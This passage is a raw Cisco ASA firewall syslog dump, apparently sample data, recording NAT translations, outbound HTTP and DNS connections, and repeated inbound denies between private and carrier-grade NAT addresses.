CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11797 for outside:100.66.19.254/80 (100.66.19.254/80) to inside:172.31.156.80/1385 (172.31.156.80/1385) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1455 to outside:100.66.98.44/8268 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1456 to outside:100.66.98.44/8269 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1457 to outside:100.66.98.44/8270 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1458 to outside:100.66.98.44/8271 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1459 to outside:100.66.98.44/8272 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1460 to outside:100.66.98.44/8273 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11564 for outside:100.66.115.46/80 to inside:172.31.156.80/1382 duration 0:05:25 bytes 575 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11797 for outside:100.66.19.254/80 to inside:172.31.156.80/1385 duration 0:00:00 bytes 5391 TCP Reset-I -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.156.80/1386 to outside:100.66.98.44/8278 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11798 for outside:100.66.115.46/80 (100.66.115.46/80) to inside:172.31.156.80/1386 (172.31.156.80/1386) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.19.254/80 dst inside:172.31.98.44/8277 by access-group "inbound" [0x0, 0x0] -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1275 to outside:100.66.98.44/8279 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11799 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1275 (172.31.98.44/1275) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:100.66.98.44/1190 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11800 for outside:100.66.14.30/53 (100.66.14.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11800 for outside:100.66.14.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 373 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11801 for outside:100.66.252.210/53 (100.66.252.210/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11801 for outside:100.66.252.210/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 207 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11802 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1276 (172.31.98.44/1276) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11803 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1277 (172.31.98.44/1277) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11802 for outside:100.66.98.165/80 to inside:172.31.98.44/1276 duration 0:00:00 bytes 12853 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11804 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1278 (172.31.98.44/1278) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11803 for outside:100.66.98.165/80 to inside:172.31.98.44/1277 duration 0:00:00 bytes 5291 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11805 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1279 (172.31.98.44/1279) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11804 for outside:100.66.98.165/80 to inside:172.31.98.44/1278 duration 0:00:00 bytes 965 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11805 for outside:100.66.98.165/80 to inside:172.31.98.44/1279 duration 0:00:00 bytes 8605 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11806 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1280 (172.31.98.44/1280) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11806 for outside:100.66.98.165/80 to inside:172.31.98.44/1280 duration 0:00:00 bytes 3428 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11807 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1281 (172.31.98.44/1281) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11808 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1282 (172.31.98.44/1282) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11809 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1283 (172.31.98.44/1283) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11810 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1284 (172.31.98.44/1284) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11807 for outside:100.66.98.165/80 to inside:172.31.98.44/1281 duration 0:00:00 bytes 2028 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11808 for outside:100.66.98.165/80 to inside:172.31.98.44/1282 duration 0:00:00 bytes 1085 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11809 for outside:100.66.98.165/80 to inside:172.31.98.44/1283 duration 0:00:00 bytes 868 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11811 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1285 (172.31.98.44/1285) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11812 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1286 (172.31.98.44/1286) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11810 for outside:100.66.98.165/80 to inside:172.31.98.44/1284 duration 0:00:00 bytes 4439 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11813 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1287 (172.31.98.44/1287) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11811 for outside:100.66.98.165/80 to inside:172.31.98.44/1285 duration 0:00:00 bytes 914 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11812 for outside:100.66.98.165/80 to inside:172.31.98.44/1286 duration 0:00:00 bytes 871 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305) -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30 -Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to 